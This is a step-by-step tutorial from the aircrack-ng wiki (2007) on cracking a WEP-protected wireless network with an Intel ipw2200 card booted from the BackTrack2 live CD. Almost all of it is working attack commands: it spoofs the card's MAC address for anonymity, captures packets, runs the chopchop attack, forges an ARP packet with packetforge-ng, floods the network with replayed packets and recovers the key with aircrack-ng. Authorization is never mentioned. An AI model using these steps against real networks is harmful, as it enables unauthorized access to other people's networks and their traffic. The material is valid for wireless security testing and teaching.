====== Tutorial: How to crack wep using an ipw2200 based card ====== Version: 0.1 August 27, 2007 \\ By: drio \\ === TODO: === - How to compile from scratch the device driver to support injection - screen usage example - Different attacks - More detailed explanation about what we are doing on each step - upgrade airodump-ng tools from the livecd. ===== Introduction ===== This document is based in this [[http://forum.aircrack-ng.org/index.php?topic=2077.0|post]] you can find in the [[http://forum.aircrack-ng.org/index.php|forums]]. When I started using the aircrack-ng tools I did not have the [[Compatibility_Drivers|best hardware]] for it. I only had an IBM Thinkpad T42 that comes with an Intel 2200BG card. Most of the wep attacks require to inject some packets in the network in order to speed up the process of gathering IVs. In order to do that, the device driver that we use for controlling our card has to support injection. This [[newbie_guide|tutorial]] explains you how to compile and install modules in your linux box. Installing linux in my box was not an option so I decided to use the [[http://www.remote-exploit.org/backtrack.html|backtrack2]] livecd. Backtrack comes already with the necessary drivers compiled and ready to be use directly from the cd. Here are the basic steps we will be going through: *1 - Verify that our ipw2200 card is recognized by the OS (Linux). *2 - List available networks *3 - Change the MAC address of our card. *4 - Configure the wireless parameters using iwconfig. *5 - Collect data with airodump-ng *5 - Launch the [[korek_chopchop|chopchop]] attack *6 - Create the ARP request packet *7 - Send the ARP request over and over *8 - Wait to gather enough IVs *9 - Crack the WEP key using aircrack-ng Keep in mind that we are going to be running different commands and we will need to check switch between them. Most documents recommend to start [[http://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/X_Window_core_protocol|Xwindow]] and open then various xterminals. There is another option: [[http://en.wikipedia.org/wiki/GNU_Screen|screen]]. ===== Verify that our ipw2200 card is recognized by the OS (Linux) ===== Once the livecd has booted and you have logon, you can run this to verify that you actually have an ipw2200 base card: # lspci -vv ..... 02:02.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05) Subsystem: Intel Corporation Unknown device 2711 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- SERR- /sys/class/net/eth1/device/rtap_iface That's the method I would recommend. But, if you are using the latest version of airodump-ng (we'll use it in the next section) you can tell the program to create the rtap0 device for you: # airodump-ng -c X rtap0 We'll talk it in the next section. Ok, so we have verified that we have an ipw2200 card and that Linux can talk to it. ===== List available networks ===== Now, we want to get a list of the wireless networks we have around. To do that: # iwconfig eth1 list Keep the output of this command in a window we will use it later. === NOTE: === I am assuming that linux mapped your wireless card under eth1. Most likely you have an ethernet card under eth0. ===== Change the MAC address of our card ===== This step is optional but it will give us some anonymity. On a new window: # ifconfig eth1 up hw ether 00:11:22:33:44:55 ===== Configure the wireless parameters ===== Let's start configuring the wireless essid, channel, and setting up a fake key: # iwconfig eth1 essid channel <#> key s:fakekey mode managed Due to some limitations with the firmware we have to force a fakekey and set managed mode to ensure the aircrack-ng tools work properly. ESSID is the name of the wireless network of our target AP. Channel is the wireless channel. ===== Collect data with airodump-ng ===== In another window, we start collecting data: # airodump-ng -c --bssid -w dump rtap0 Notice how we use rtap0 as a input interface. Also, all these commands we are going to be running generate output files. So it is a good idea to create a new directory and to run all of them from there. As we said before, if you are running the latest version of airodump-ng, rtap0 will be created for you automatically in case you didn't before. ===== Launch the chopchop attack ===== Now it is time to do some injection. In a new window we will launch the chopchop attack: # aireplay-ng -4 -a -h 00:11:22:33:44:55 -i rtap0 eth1 Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop). A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "replay_dec-######.xor" Make sure there are no errors reported after using aireplay. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine. If the attack fails, try to rerun the command again omitting the "-h " parameter. ===== Create the arp request packet ===== Now we will create an arp-request packet using the acquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. If you use valid destination IPs then you will be running an [[arp_amplification|amplification attack]]. This can be run in the same window we run the chopchop attack: # packetforge-ng -0 -a -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request ===== Send the arp request over and over ===== Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the window were we had airodump-ng running. If the data doesn't change (usually between 80 and 350 per second) then something is wrong. # aireplay-ng -2 -r arp-request eth1 ===== Wait to gather enough IVs ===== We have to wait now so airodump-ng gathers enough data (enough IVs) so we can run aircrack-ng. How many packages we need so aircrack-ng cracks the wep key? It depends. The version of aircrack-ng that comes with backtrack2 is not the latest one so we need around 1.000.000 of IVs. If we are using the latest version (0.9 and up) 100.000 is enough. ===== Crack the wep key using aircrack-ng ===== In another window we launch: # aircrack-ng -z dump*.cap Depending the number of packages you have gathered, this may take some minutes or you may get the key immediately. The -z argument tells aircrack-ng to also try the PTW attack. If you version of aircrack-ng doesn't support it, just omit it. === NOTE: === aircrack-ng can run concurrently with airodump-ng. This is very interesting because it will allow you to check the number of IVs that airodump-ng has gathered. You can cancel the execution of aircrack-ng and wait for more data to be gathered.